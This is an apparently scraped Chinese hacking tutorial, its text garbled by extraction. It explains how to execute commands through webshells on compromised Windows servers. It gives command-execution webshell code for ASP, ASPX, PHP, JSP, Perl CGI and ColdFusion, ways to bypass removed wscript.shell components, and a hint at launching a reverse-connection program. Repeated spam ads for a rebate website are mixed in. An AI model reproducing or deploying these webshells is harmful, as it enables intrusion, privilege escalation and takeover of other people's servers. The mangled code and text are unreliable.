浅谈在WEBSHELL下如何运行命令.docx
《浅谈在WEBSHELL下如何运行命令.docx》由会员分享,可在线阅读,更多相关《浅谈在WEBSHELL下如何运行命令.docx(20页珍藏版)》请在冰豆网上搜索。
![浅谈在WEBSHELL下如何运行命令.docx](https://file1.bdocx.com/fileroot1/2023-2/3/e6257a02-0258-4c83-af52-c444d7aab990/e6257a02-0258-4c83-af52-c444d7aab9901.gif)
浅谈在浅谈在WEBSHELL下如何运行命令下如何运行命令浅谈在WEBSHELL下如何运行命令Author:
kyo327EMail:
Date:
2010-06-16Thanks:
互联网目录000前言001在asp环境下运行命令的方法002在aspx环境下运行命令的方法003在php环境下运行命令的方法004在jsp环境下运行命令的方法005其他脚本环境下运行命令的方法006后记000前言随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的活力。
但是这样就会导致越来越多的WEB安全问题的出现,比如sql注入、XSS、上传漏洞、弱口令、目录遍历等,虽然早在数十年前就被发现这些漏洞产生的根本原因,可它们却始终都没有退出历史的舞台,依然是WEB应用程序主要的安全问题,其实这也不是安全厂商和企业不重视安全,也许是恶意入侵者又从他们的安全解决方案里找到新的漏洞、也许是配合其他的漏洞形成一个不是漏洞的漏洞、也许是服务器配置方面出现了问题、也许是出于对用户的信任(因为不是所有的用户都是循规蹈矩的)、再或许是由新增加应用导致的。
总之还是一句话,安全是一个整体。
*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。
http:
/返利网,淘你喜欢,淘宝返利,淘宝返现购物。
*在当前这个时代,靠一个远程溢出直接获得一个SHELL对于一般的黑客来说是过于奢侈了,就算真的有传说中的80端口溢出,也要看目标值不值得用。
所以一般来说大多数黑客还是从WEB应用入手。
不论用什么方法吧,先拿到一个WEBSHELL是最基本的,哪怕仅仅是同C类网段的一台机器,起码可以试试ARP嗅探。
而拿到一个WEBSHELL后,面临最多的一个问题就是提升权限。
特别是在遇到虚拟主机的时候,当你的目标在另外一个目录,你没有办法进目标网站,仅仅是靠旁注进了同一服务器的其他站点,这种情况提权跨目录成了必经之路。
但是要提升权限基本上都是要执行命令的,现在的大多数WEB服务器、虚拟主机等都做了安全设置,因此本文就谈一谈在各种脚本语言环境下都有哪些方法可以执行命令。
(本文仅探讨服务器为windows的情况)001在asp环境下运行命令的方法当拿到一个asp的WEBSHELL时,想运行命令,一般是先查看一下组件支持情况。
如图1图1可以看到,图1中显示是不支持wscript.shell和work的。
而服务器有可能只是在注册表中改了名称,却没有卸载或删除C:
windowsSystem32wshom.ocx。
这样可以上传下面这段脚本试一试:
MyCode1:
inputtype=textname=cmdsize=60value=当服务设置卸载(regsvr32/uC:
windowsSystem32wshom.ocx)或删除了wshom.ocx时,我们还可以使用shell.application组件来运行命令。
在我进行测试时,发现海洋2006中所带的shell.application运行器无法在windows2003中运行命令,在win2000中倒是没问题的。
*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。
http:
/返利网,淘你喜欢,淘宝返利,淘宝返现购物。
*在后来的不经意的测试中,我发现了使用shell.application在win2003中运行命令的方法。
代码如下:
MyCode2:
%response.writeshellapplication执行命令无回显%程序所在的物理路径:
shellapplication执行命令bykyo327formaction=method=POST程序路径:
参数:
inputtype=textname=text2size=60value=%appnames=Request.Form(text1)canshu=Request.Form(text2)ifappnamesthensetkyoshell=createobject(shell.application)kyoshell.ShellExecuteappnames,canshu,open,0response.write执行成功!
endif%运行命令如图2:
图2:
以上是我所知道的在asp环境下执行命令的两种方法。
Mycode1是利用wscript.shell组件,mycode2是利用了shell.application组件。
002在aspx环境下运行命令的方法微软的.net战略已经在全世界已经全面打响,未来肯定会完全的抛弃asp,当然从涌现出的越来越多的web应用就可以看得出来。
由于.net强大的函数库和安装运行不依赖注册表的特性,如果你所获得的webshell支持aspx,基本这台服务器不会逃脱被运行命令的厄运。
不过前提是你需要找到一个可写可执行exe的目录。
现在我们谈一谈运行命令的几种方法:
第一种,很多人估计很熟悉了,就是利用Process.Start()。
代码如下:
Mycode3:
cmdshellvoidButton_Click1(objectsender,EventArgse)tryProcessshell=newProcess();shell.StartInfo.FileName=PathTextBox.Text;shell.StartInfo.Arguments=ShellTextBox.Text;shell.StartInfo.UseShellExecute=false;shell.StartInfo.RedirectStandardInput=true;shell.StartInfo.RedirectStandardOutput=true;shell.StartInfo.RedirectStandardError=true;shell.Start();stringstr1=shell.StandardOutput.ReadToEnd();str1=str1.Replace(,>);myLabel.Text=+str1+;catch(ExceptionError)myLabel2.Text=错误代码:
+Error.Message;命令执行bykyo程序路径:
C:
DocumentsandSettingsAllUsersDocumentscmd.exe命令参数:
/cver执行命令如图3:
图3第2种方法:
还是靠wscript.shell组件来执行。
代码如下:
Mycode4:
subrun(SrcAsObject,EAsEventArgs)DimStrResultAsStringDimshellAsObjectshell=Server.CreateObject(WScript.Shell)StrResult=shell.exec(path.Text&/c&box.Text).stdout.readallStrResult=Replace(StrResult,>)ResultLabel.Text=&StrResult&endsub程序路径:
命令参数:
另外如果服务器卸载了wscript.shell,我们还可以将C:
windowsSystem32wshom.ocx转化为.net组件放入web根目录的bin目录里,然后调用wscript.shell。
如图4转换完成之后,把kyoweb.dll文件copy到web根目录的bin文件夹内,利用.net运行程序不依赖注册表的特性,我们就又可以调用wscript.shell了。
代码如下:
Mycode5subrun(SrcAsObject,EAsEventArgs)DimStrResultAsStringDimshellAsNewkyoweb.WshShellStrResult=shell.exec(path.Text&/c&box.Text).stdout.readallStrResult=Replace(StrResult,>)ResultLabel.Text=&StrResult&endsub后面的从开始与mycode4相同。
第3种方法:
当然还是利用shell.application组件。
代码如下:
Mycode6:
subrun(SrcAsObject,EAsEventArgs)DimappNameAsStringDimappArgsAsStringDimloveAsObjectlove=Server.CreateObject(Shell.Application)appName=appnames.TextappArgs=canshu.Textlove.ShellExecute(appName,appArgs,open,0)endsubshellapplicationForASP.NETBykyo327利用shell.application执行命令for程序路径名:
参数:
运行结果如图5:
当然我们还可以把c:
windowssystem32shell32.dll转为.net放入bin文件夹再调用。
具体转换操作与转换wshom.ocx基本一样。
这里我直接出代码:
Mycode7:
subrun(SrcAsObject,EAsEventArgs)DimappNameAsStringDimappArgsAsStringDimloveAsNewkyoshells.ShellappName=appnames.TextappArgs=canshu.Textlove.ShellExecute(appName,appArgs,open,0)endsub仍然从开始后面的代码与mycode5相同。
*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。
http:
/返利网,淘你喜欢,淘宝返利,淘宝返现购物。
*003在php环境下运行命令的方法Php在WEB应用中的地位越来越被看重,也有更多的程序员加入php程序员的行列。
但php语言的WEB脚本环境下执行命令的方法却有很多种,所以不论是程序员或是管理员或是黑客,都有必要学习一下php执行命令的方法。
我所知道的php在windows服务器上执行命令至少有以下几种方法。
1.wscript.shell2.shell.application3.system();4.exec();5.passthru();6.shell_exec();7.popen();8.proc_open();由于这几个函数使用比较简单,我把它们组合在一起了。
代码如下:
Mycode8:
exec(cm.d.e.xe/c.$_GETwscript.);$stdout=$exec-StdOut();$stroutput=$stdout-ReadAll();echo$stroutput;elseif(key($_GET)=proc_open)$descriptorspec=array(0=array(pipe,r),1=array(pipe,w),2=array(pipe,w);$process=proc_open(C:
Docume1alluse1Documentscmd.exe,$descriptorspec,$pipes);if(is_resource($process)fwrite($pipes0,.$_GETproc_open.rn);fwrite($pipes0,exitrn);fclose($pipes0);while(!
feof($pipes1)echofgets($pipes1,1024);fclose($pipes1);while(!
feof($pipes2)echofgets($pipes2,1024);fclose($pipes2);proc_close($process);?
在浏览器地址栏这样写以测试各种方法:
http:
/127.0.0.1/cmdshell.php?
system=dirhttp:
/127.0.0.1/cmdshell.php?
passthru=dirhttp:
/127.0.0.1/cmdshell.php?
exec=dirhttp:
/127.0.0.1/cmdshell.php?
shell_exec=dirhttp:
/127.0.0.1/cmdshell.php?
popen=dirhttp:
/127.0.0.1/cmdshell.php?
wscript=dirhttp:
/127.0.0.1/cmdshell.php?
proc_open=dir最后还有一个shell.application方法也能执行程序。
Mycode9:
open(C:
Docume1alluse1Documentsfanlian.exe);/没有回显,多了个fanlian进程,可以直接执行一个反向连接程序反弹回来?
004在jsp环境下运行命令的方法一般来说都用的是这个方法:
Runtime.getRuntime().exec(command);代码如下:
Mycode10:
用法:
http:
/127.0.0.1/cmd.jsp?
cmd=ipconfig005其他脚本环境下运行命令的方法1.在CGI环境下支持的编程语言较多,执行命令的方法也不止一种,但这种WEB环境算是古董了,基本上现在用它的已经不多了。
这里就以perl为例子,并且以最常用的方法system()作为例子。
代码如下:
Mycode11:
#!
/usr/bin/perlread(STDIN,$POST,$ENVCONTENT_LENGTH);($key,$command)=split(/=/,$POST);$command=s/%(a-fA-f0-9a-fA-f0-9)/pack(C,hex($1)/eg;$command=s/+/;$output=system$commanda.txt;$output=s/n/;printContent-Type:
text/htmlnn;printEOF;EOFopen(OUTPUT,a.txt)|diecannotopen$!
;output=;printEOF;outputEOFcloseOUTPUT;unlink(a.txt);exit;2.支持cfm执行命令的方法,专门有个标识语法是代码如下:
Mycode12:
CFMshell#cmd#formaction=#CGI.SCRIPT_NAME#method=post#readText#006后记本文把当今流行的几种WEB语言在windows平台运行命令的方法总结了一下,针对于比较流行的语言说的较详细一些,而象cgi、perl、cfm谈的少了一点,毕竟现在互联网上已经较少的存在那些古董级的平台环境了。
另外也是希望起到抛砖引玉的作用,也期待安全爱好者把我没有考虑到的知识点给加进来,使这份文档逐渐完善起来。
*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。
http:
/返利网,淘你喜欢,淘宝返利,淘宝返现购物。
*